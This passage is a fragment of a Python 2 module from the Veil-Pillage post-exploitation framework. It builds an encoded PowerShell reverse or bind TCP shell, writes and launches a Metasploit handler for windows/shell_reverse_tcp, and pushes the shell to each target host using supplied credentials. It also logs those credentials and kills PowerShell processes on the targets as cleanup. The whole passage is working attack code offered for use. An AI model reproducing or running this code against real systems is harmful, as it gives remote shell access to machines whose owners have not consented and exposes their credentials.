= $false while (-not $done) { $pos = 0 $i = 1 while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read = $ns.Read($nb,$pos,$nb.Length - $pos) $pos+=$read if ($pos -and ($nb[0..$($pos-1)] -contains 10)){break}} if ($pos -gt 0) { $string = $en.GetString($nb,0,$pos) $is.write($string) $out = $en.GetString($os.Read()) while($os.Peek() -ne -1){$out += $en.GetString($os.Read())} $ns.Write($en.GetBytes($out),0,$out.length) $out = $null} else {$done = $true}} """ %(lport) # if the user specific a reverse_tcp shell if shell.lower() == "rev_tcp": # make sure we have lhost filled in if lhost == "none": print helpers.color(" [!] 'lhost' required for rev_tcp! ", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # get the encoded powershell trigger command triggerCMD = helpers.encPowershell(revTCPShell) handler += "\nset PAYLOAD windows/shell_reverse_tcp" handler += "\nset LHOST " + lhost handler += "\nset LPORT " + lport handler += "\nset ExitOnSession false" handler += "\nexploit -j\n" f = open('/tmp/handler.rc', 'w') f.write(handler) f.close() # build and spawn a handler for the reverse shell if spawnHandler.lower() == "true": handlerPath = "/tmp/handler.rc" # command to spawn a new tab cmd = "gnome-terminal --tab -t \"Veil-Pillage Handler\" -x bash -c \"echo ' [*] Spawning Metasploit handler...' && msfconsole -r '" + handlerPath + "'\"" # invoke msfconsole with the handler script in a new tab os.system(cmd) raw_input("\n\n [>] Press enter when handler is ready: ") # bind_tco shell is easier :) elif shell.lower() == "bind_tcp": triggerCMD = helpers.encPowershell(bindTCPShell) else: print helpers.color("\n [!] Shell not recognized: please enter rev_tcp or bind_tcp\n", warning=True) raw_input("\n [>] Press enter to continue: ") return "" # execute the powershell trigger command on each target for target in self.targets: # trigger the command and set output as appropriate print "\n [*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" on "+target self.output += "[*] Triggering powershell shell '"+shell.lower()+"' with lhost="+lhost+" and lport="+lport+" using creds '"+username+":"+password+"' on "+target+"\n" command_methods.executeCommand(target, username, password, triggerCMD, triggerMethod) # build our cleanup file -> kill all powershell processes killCMD = "taskkill /f /im powershell.exe" self.cleanup += "executeCommand|"+target+"|"+username+"|"+password+"|"+killCMD+"|"+triggerMethod+"\n"